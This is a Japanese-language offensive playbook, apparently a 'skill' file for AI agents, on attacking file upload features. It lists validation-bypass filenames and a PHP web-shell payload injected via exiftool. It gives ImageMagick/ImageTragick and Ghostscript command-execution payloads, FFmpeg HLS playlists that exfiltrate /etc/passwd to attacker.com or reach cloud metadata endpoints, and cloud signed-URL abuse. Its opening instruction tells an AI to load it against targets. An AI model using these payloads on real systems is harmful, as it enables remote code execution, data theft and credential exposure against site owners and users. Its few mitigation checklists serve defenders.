SKILL: Upload Insecure Files — 検証バイパス、ストレージ悪用、および処理チェーン

AI LOAD INSTRUCTION: ファイルアップロード攻撃のエキスパート プレイブック。ターゲットがファイル、インポート、アバター、メディア、ドキュメント、またはアーカイブを受け入れる場合に使用してください。完全なワークフロー、検証バイパス、ストレージパス悪用、アップロード後アクセス、パーサー悪用、マルチテナント上書き、および XSS、XXE、CMDi、パストラバーサル、またはビジネスロジック影響へのチェーンが必要な場合に使用します。Web サーバー パース脆弱性、PUT メソッド悪用、および特定の CVE (WebLogic、Flink、Tomcat) については、コンパニオン SCENARIOS.md を読み込んでください。

0. 関連ルーティング

拡張シナリオ

以下が必要な場合は SCENARIOS.md も読み込んでください:

• IIS パース脆弱性 — x.asp/ ディレクトリパース、; セミコロン切り詰め (shell.asp;.jpg)
• Nginx パース設定ミス — cgi.fix_pathinfo=1 の場合の avatar.jpg/.php
• Apache パース — 複数の拡張子、AddHandler、CVE-2017-15715 \n (0x0A) バイパス
• PUT メソッド悪用 — IIS WebDAV PUT+COPY、Tomcat CVE-2017-12615 readonly + .jsp/ バイパス
• WebLogic CVE-2018-2894 Web Service Test Page 経由の任意ファイルアップロード
• Apache Flink CVE-2020-17518 パストラバーサル付きファイルアップロード
• アップロード + パース脆弱性チェーン — EXIF PHP コード + Nginx /.php パスインフォ
• 完全な拡張子バイパス参照テーブル (PHP/ASP/JSP 代替案、大文字小文字変更、ヌルバイト)

このファイルをディープアップロード ワークフロー参照として使用してください。また以下も読み込んでください:

• ファイル名、抽出パス、またはインクルード パスがファイルシステム制御になる場合は path traversal lfi
• アップロードがブラウザコンテキストで描画される場合は xss cross site scripting
• SVG、OOXML、または XML インポートが受け入れられる場合は xxe xml external entity
• プロセッサ、コンバーター、またはメディア パイプラインがシステムツールを実行する場合は cmdi command injection
• クォータ、上書きルール、承認、またはストレージパスがロジック バグを作成する場合は business logic vulnerabilities
• サーバーが Apache Tomcat であり WAF が filename* 内の .jsp をブロックする場合は ghost-bits-cast-attack — Tomcat の RFC2231Utility は各文字を 1 バイトに絞り込むため、1.陪sp (U+966A 下位バイト = j) は WAF がリテラル .jsp を見ない間に 1.jsp としてディスクに書き込まれます

---

1. コアモデル

すべてのアップロード機能は 4 つの個別トラスト境界としてテストする必要があります:

1. Accept: ファイルが保存される前にどのような検証が行われるか?
2. Store: ファイルはどこに、どのような名前と権限で書き込まれるか?
3. Process: バックグラウンドツール、コンバーター、スキャナー、パーサー、または抽出ツールで何が実行されるか?
4. Serve: 後でどのようにダウンロード、描画、変換、または共有されるか?

多くのターゲットは 1 つのステージのみを検証します。バグは通常、ファイルがアップロードされたのと異なるステージに現れます。

---

2. 最初に確認質問を実施

ペイロード選択の前に、以下に答えてください:

• どの拡張子が許可、拒否、または正規化されるか?
• バックエンドは拡張子、MIME タイプ、マジックバイト、またはすべてを信頼するか?
• ファイルは名前変更、トランスコード、解凍、スキャン、または再ホストされるか?
• 取得は直接、プロキシ経由、署名付き、または CDN から提供されるか?
• 1 人のユーザーが別のユーザーのファイルパスを予測または上書きできるか?
• ファイル名、メタデータ、またはプレビューは HTML、ログ、管理コンソール、または PDF に反映されるか?

---

3. 検証バイパス マトリックス

検証スタイル	テスト対象
拡張子ブラックリスト	ダブル拡張子、大文字小文字切り替え、末尾ドット、代替区切り文字
content-type のみ	マルチパート Content-Type の不一致、ブラウザ対プロキシ書き換え
マジックバイトのみ	ポリグロットファイルまたは有効なヘッダー + 危険なテール コンテンツ
サーバー側名前変更	危険なコンテンツが名前変更後および後続の描画を通じて保持されるかどうか
画像のみポリシー	SVG、形式が正しくない画像 + メタデータ、パーサー差分
アーカイブまたはインポートのみ	zip コンテンツ、ネストされたパス名、XML メンバー、解凍動作

代表的なバイパス ファミリー:

shell.php.jpg
avatar.jpg.php
file.asp;.jpg
file.php%00.jpg
file.svg
archive.zip

この小さなサンプル セットは既に以前のスタンドアロン アップロード ペイロード ヘルパーの主な使用例をカバーしているため、最初のパス選択用に追加エントリは必要ありません。

アップロード成功で止めないでください。危険な取得または処理がないアップロード成功は十分ではありません。

---

4. ストレージと取得の悪用

予測可能または制御可能なパス

以下のようなパターンを探してください:

/uploads/USER_ID/avatar.png
/files/org-slug/report.pdf
/cdn/tmp/<uuid>/<filename>

以下をテストしてください:

• ID、スラッグ、または UUID パターンを推測することによるクロステナント読み取り
• 別のユーザーのファイル名を再利用することによる上書き
• ファイル名またはアーカイブメンバーのパス正規化バグ
• UI レベルのアクセス制御にもかかわらず直接オブジェクト URL を通じて公開された個人ファイル

ファイル名ベースの注入サーフェス

安全なファイルでも、ファイル名が以下に反映される場合は危険です:

• ギャラリー HTML
• 管理者モデレーション パネル
• PDF/CSV エクスポート ジョブ
• ログ、監査ビュー、またはメール通知

ファイル名が反映される場合は、パッシブメタデータではなく保存されている入力として扱ってください。

---

5. 処理チェーン攻撃

最高価値のアップロード バグは多くの場合、非同期プロセッサに存在します。

一般的なプロセッサ クラス

プロセッサ	リスク
画像サイズ変更またはサムネイル作成	パーサー差分、ImageMagick またはライブラリ バグ、メタデータ反映
ビデオまたはオーディオ トランスコーディング	FFmpeg スタイルのパース およびプロトコル悪用
アーカイブ抽出	Zip スリップ、上書き、解凍爆弾
ドキュメント インポート	CSV フォーミュラ注入、Office XML パース、マクロ隣接ワークフロー
XML または SVG パース	XXE、SSRF、ローカルファイル開示
HTML to PDF またはプレビュー描画	SSRF、スクリプト実行、ローカルファイル参照
AV または DLP スキャン	解凍深度、隠れたネストされたコンテンツ、競合状態

何を証明するか

1. ファイルはプロセッサに触れられます。
2. プロセッサはアップロード検証と異なる動作をします。
3. その違いは影響を作成します: 読み取り、実行、上書き、SSRF、または保存されているクライアント側実行。

---

6. 高価値悪用パス

ブラウザ実行

• アクティブコンテンツとして提供される SVG
• インライン描画される HTML またはテキスト アップロード
• EXIF またはファイル名が HTML ページに反映される

XML およびドキュメント パース

• ファイル読み取りまたは SSRF 用の SVG XXE
• XML エンティティまたはパーサー悪用用の OOXML インポート
• アナリスト ワークフローでの式実行用の CSV インポート

サーバー側実行またはファイルシステム影響

• シェル ツールを呼び出す画像またはドキュメント コンバーター
• 意図されたディレクトリの外部に書き込む Zip スリップ
• アップロード-LFI チェーン、ここでアップロードされたコンテンツは後で包含可能になります

アクセス制御および共有バグ

• 予測可能な URL を通じてアクセス可能な個人アップロード
• モデレーションまたは検疫パスはまだ公開可能です
• 1 人のユーザーが別のユーザーの公開アセットを置き換え

---

7. 認可およびビジネスロジック チェック

アップロード機能は頻繁にパーサー以外のバグを非表示にします:

• UI では実装されるがアップロード検証はされないアップロード クォータ
• アップロード ページで確認されるがインポート エンドポイントで確認されないプラン制限
• リスト ビューで確認されるがダイレクト ダウンロードまたは置き換え エンドポイントで確認されないファイル所有権
• 最終ストレージ エンドポイントを直接呼び出すことでバイパスされる承認ワークフロー
• 削除またはアクション置き換えがオブジェクト レベルの認可を欠く

アップロード パスにアカウント、プロジェクト、またはリソース識別子が含まれる場合は、常に A/B 認可テストを実行してください。

---

8. テスト順序

1. 1 つの無害なマーカー ファイルをアップロードし、名前変更、パス、および取得動作をマップします。
2. 1 つの検証バイパス サンプルと 1 つのアクティブ コンテンツ サンプルを試してください。
3. 取得がアタッチメント、インライン描画、変換されたプレビュー、またはバックグラウンド処理であるかどうかを確認してください。
4. 処理が存在する場合は、プロセッサ ファミリーでピボット: XSS、XXE、CMDi、Zip スリップ、または SSRF。
5. ファイル ID、置き換え エンドポイント、および公開 URL に対してテナント境界および上書き テストを実行します。

---

9. チェーニング マップ

観察	ピボット
SVG または XML 受け入れ	xxe xml external entity
ファイル名またはメタデータ反映	xss cross site scripting
コンバーターまたはプロセッサ シェルアウト	cmdi command injection
抽出パスが制御可能に見える	path traversal lfi
上書き、クォータ、承認、またはテナント バグ	business logic vulnerabilities

---

10. オペレーター チェックリスト

[] accept/store/process/serve ステージを個別に確認する
[] 1 つの拡張子バイパスと 1 つのコンテンツ ベースのペイロードをテストする
[] インライン描画対強制ダウンロードを確認する
[] ファイル名、メタデータ、およびプレビュー サーフェスを反映用に検査する
[] 処理チェーンをプローブ: 画像、アーカイブ、XML、ドキュメント、PDF
[] 読み取り、置き換え、削除、および共有アクションに対して A/B 認可を実行する
[] 予測可能なパスとパブリック/プライベート URL 境界をマップする

---

11. アップロード成功率モデルおよび高度な方法論

成功率フォーミュラ

P(RCE via Upload) = P(bypass_detection) × P(obtain_path) × P(execute_via_webserver)

多くのテスターはファイル タイプ チェックをバイパスすることのみに焦点を当てていますが、以下を忘れています:

• パス発見: アップロード パスを知らない場合、成功したバイパスでも役に立ちません
• サーバー パース: .php ファイルがアップロードされた場合でも、Web サーバーが PHP として解析しなければ、RCE はありません

リッチ テキスト エディター パス マトリックス

エディター	一般的なアップロード パス	バージョン インジケーター
FCKeditor	/fckeditor/editor/filemanager/connectors/	/fckeditor/_whatsnew.html
CKEditor	/ckeditor/	/ckeditor/CHANGES.md
eWebEditor	/ewebeditor/	管理者: /ewebeditor/admin_login.asp
KindEditor	/kindeditor/attached/	/kindeditor/kindeditor.js
UEditor	/ueditor/net/ または /ueditor/php/	/ueditor/ueditor.config.js

検証欠陥分類法 (5 つの次元)

次元	欠陥例
位置	クライアント側のみ、フロント/バック一貫性なし
方法	拡張子ブラックリスト (不完全)、MIME チェックのみ、マジックバイトのみ
ロジック順序	実行チェック後に名前変更、完全なアップロード前に検証
スコープ	ファイル名は確認するがファイル コンテンツは確認しない、最初のバイトのみ確認
実行コンテキスト	アップロード成功しますが異なる vhost/ハンドラーがファイルを処理

レスポンス操作バイパス

# サーバーがクライアント側検証用のレスポンスで allowedTypes を返す場合:
# レスポンスをインターセプト → allowedTypes を変更して .php を含める → .php をアップロード
# サーバーは実際に検証しません — クライアント フィルタリングを信頼しています

IIS セミコロン パース

# IIS はファイル名のセミコロンをパラメーター デリミターとして扱います:
shell.asp;.jpg    → IIS は ASP として実行します
# NTFS 代替データ ストリーム:
shell.asp::$DATA  → 拡張子チェックをバイパス、IIS は実行される可能性があります

Apache マルチ拡張子

# Apache はハンドラーの右から左に解析します:
shell.php.jpg     → AddHandler php が適用される場合、PHP として実行される可能性があります
# ファイル名の改行 (CVE-2017-15715):
shell.php\x0a     → 正規表現をバイパスしますが Apache は PHP として実行します

Nginx cgi.fix_pathinfo

# cgi.fix_pathinfo=1 (PHP-FPM):
/uploads/image.jpg/anything.php → PHP は image.jpg を PHP として処理します!
# 埋め込み PHP コード付きの見かけは正当な JPG をアップロード

---

12. ポリグロット ファイル技術

形式固有の検証をバイパスしながら危険なペイロードを配信する 2 つ以上の形式で同時に有効なファイル。

GIFAR (GIF + JAR)

# GIF ヘッダー + JAR 追加
# GIF89a ヘッダー (6 バイト) + パディング + JAR アーカイブ (ZIP 形式)
# ブラウザ: 有効な GIF 画像
# Java: 有効な JAR アーカイブ → アプレット実行 (レガシー)

cat header.gif payload.jar > gifar.gif
# 画像検証を通過、<applet> 経由で読み込まれた場合 Java アプレットとして実行

PNG + PHP ポリグロット

# PNG IDAT チャンク または tEXt メタデータに PHP コードを注入
# PNG は有効な画像として描画されます。LFI 経由で含まれると、PHP コードは実行されます

# 方法 1: tEXt チャンク に PHP
python3 -c "
import struct
png_header = b'\x89PNG\r\n\x1a\n'
# ... 最小限の IHDR + IDAT + PHP を含む tEXt チャンク
"

# 方法 2: exiftool を使用してコメントに注入
exiftool -Comment='<?php system($_GET["cmd"]); ?>' image.png
# image.png をアップロード → LFI インクルード → メタデータから PHP が実行

JPEG + JS ポリグロット

# JPEG コメント マーカー (0xFFFE) は JavaScript を含むことができます
# Content-Type が text/html で提供される場合 (または MIME スニッフィングがアクティブ):
exiftool -Comment='<script>alert(document.domain)</script>' photo.jpg

# コンテンツ タイプ混乱との組み合わせ → 画像アップロード経由の XSS

PDF + JS ポリグロット

# PDF ヘッダーの後に JS:
%PDF-1.0
1 0 obj<</Pages 2 0 R>>endobj
2 0 obj<</Kids[3 0 R]/Count 1>>endobj
3 0 obj<</MediaBox[0 0 3 3]>>endobj
trailer<</Root 1 0 R>>
*/=alert('XSS')/*

---

13. ImageMagick 悪用チェーン

CVE-2016-3714 (ImageTragick) — デリゲート経由の RCE

ImageMagick は特定のフォーマット変換に「デリゲート」(外部プログラム) を使用します。特別に細工されたファイルはシェル コマンド実行をトリガーします:

MVG (Magick Vector Graphics)

push graphic-context
viewbox 0 0 640 480
fill 'url(https://example.com/image.jpg"|id > /tmp/pwned")'
pop graphic-context

SVG デリゲート悪用

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg width="640px" height="480px">
  <image xlink:href="https://example.com/image.jpg&quot;|id > /tmp/pwned&quot;" x="0" y="0"/>
</svg>

Ghostscript 悪用

ImageMagick は PDF/PS/EPS 処理用に Ghostscript にデリゲートします。Ghostscript は複数のサンドボックス エスケープを持っていました:

%!PS
userdict /setpagedevice undef
save
legal
{ null restore } stopped { pop } if
{ legal } stopped { pop } if
restore
mark /OutputFile (%pipe%id > /tmp/pwned) currentdevice putdeviceprops

.eps、.ps、または .pdf としてアップロード → ImageMagick は Ghostscript を呼び出す → RCE。

緩和チェック

□ ImageMagick policy.xml は危険なコーダーを制限していますか?
  <policy domain="coder" rights="none" pattern="MVG" />
  <policy domain="coder" rights="none" pattern="MSL" />
  <policy domain="coder" rights="none" pattern="EPHEMERAL" />
  <policy domain="coder" rights="none" pattern="URL" />
  <policy domain="coder" rights="none" pattern="HTTPS" />
□ Ghostscript は更新され、サンドボックス化されていますか (-dSAFER)?

---

14. FFmpeg SSRF およびローカルファイル読み取り

HLS プレイリスト ファイル読み取り

#EXTM3U
#EXT-X-MEDIA-SEQUENCE:0
#EXTINF:10.0,
concat:http://attacker.com/header.txt|file:///etc/passwd
#EXT-X-ENDLIST

.m3u8 または .ts としてアップロード → FFmpeg がそれを処理する → ファイル コンテンツはヘッダーと連結されて攻撃者のサーバーに送信されるか、出力ビデオに埋め込まれます。

HLS 経由の SSRF

#EXTM3U
#EXT-X-MEDIA-SEQUENCE:0
#EXTINF:10.0,
http://169.254.169.254/latest/meta-data/iam/security-credentials/
#EXT-X-ENDLIST

FFmpeg がサーバー側でURLをフェッチする → SSRF をクラウド メタデータ エンドポイントに送信します。

ローカルファイル包含用の連結プロトコル

#EXTM3U
#EXTINF:1,
concat:file:///etc/passwd|subfile,,start,0,end,0,,:
#EXT-X-ENDLIST

AVI + 字幕 SSRF

URL を参照する字幕トラック付きで AVI を作成:

ffmpeg -i input.avi -vf "subtitles=http://169.254.169.254/latest/meta-data/" output.avi

---

15. クラウド ストレージ アップロード の考慮事項

S3 署名付き URL の悪用

# 特定のキーと content-type 用に生成される署名付き URL:
PUT https://bucket.s3.amazonaws.com/uploads/avatar.jpg
  ?X-Amz-Algorithm=AWS4-HMAC-SHA256&...&X-Amz-SignedHeaders=host;content-type

# 悪用: content-type が SignedHeaders に含まれていない場合:
# Content-Type を image/jpeg から text/html に変更 → XSS ペイロードをアップロード
# 署名は有効なままです (content-type は署名されていませんでした)

# パスが署名されていない場合 (プレフィックスのみ):
# キーを uploads/avatar.jpg から uploads/../admin/config.json に変更

監査チェックリスト:

□ どのヘッダーが SignedHeaders に含まれていますか? (content-type を含む必要があります)
□ 完全なキー パスが署名されていますか、それともプレフィックスのみですか?
□ アップロード バケットは提供バケットと同じですか? (CDN 提供バケットに書き込む → 保存されている XSS)
□ ACL は署名されていますか? (機密アップロードへの public-read 設定を防止)

Azure Blob Storage SAS トークン

# SAS トークン スコープの問題:
# コンテナー レベルの SAS (書き込み権限) → コンテナー内の ANY BLOB に書き込み
# サービス レベルの SAS → 他の BLOB のリスト/読み取りが可能な場合があります
# 確認: sr= (署名付きリソース)、sp= (署名付き権限)、se= (有効期限)

GCS 署名付き URL

# S3 に類似 — Content-Type が署名に含まれているかどうかを確認
# 再開可能なアップロード URL は意図した以上の幅広い権限を持つ場合があります
# V4 署名付き URL: X-Goog-SignedHeaders に content-type が含まれていることを確認

---

16. Content-Type 検証バイパス

ダブル拡張子

shell.php.jpg          → AddHandler 付き Apache は PHP として実行される可能性があります
shell.asp;.jpg         → IIS セミコロン切り詰め
shell.php%00.jpg       → ヌルバイト切り詰め (PHP < 5.3.4、古い Java)
shell.php.xxxxx        → 不明な拡張子 → Apache は前のハンドラーにフォールバック

MIME スニッフィング悪用

サーバーが Content-Type を送信しない場合、または X-Content-Type-Options: nosniff が不足している場合:

# HTML/JS コンテンツを含むファイルをアップロードしますが画像拡張子を使用
# ブラウザ MIME スニッフィング コンテンツ → HTML として実行
# 拡張子検証が成功した場合でも、保存されている XSS で機能します

Content-Type ヘッダー対拡張子 の不一致

# アップロード リクエスト:
Content-Disposition: form-data; name="file"; filename="avatar.jpg"
Content-Type: image/jpeg

# ファイル コンテンツ: <?php system($_GET['cmd']); ?>

# サーバーは Content-Type ヘッダーを信頼 (image/jpeg) → 検証を通過
# しかし他のロジックに基づいて .php 拡張子で保存 → PHP として実行

大文字小文字変更

shell.PhP    shell.pHP    shell.Php
shell.aSp    shell.jSp    shell.ASPX

末尾文字

shell.php.      → 末尾ドット (Windows はそれを削除)
shell.php::$DATA → NTFS 代替データ ストリーム (IIS)
shell.php\x20   → 末尾スペース
shell.php%20    → URL エンコード スペース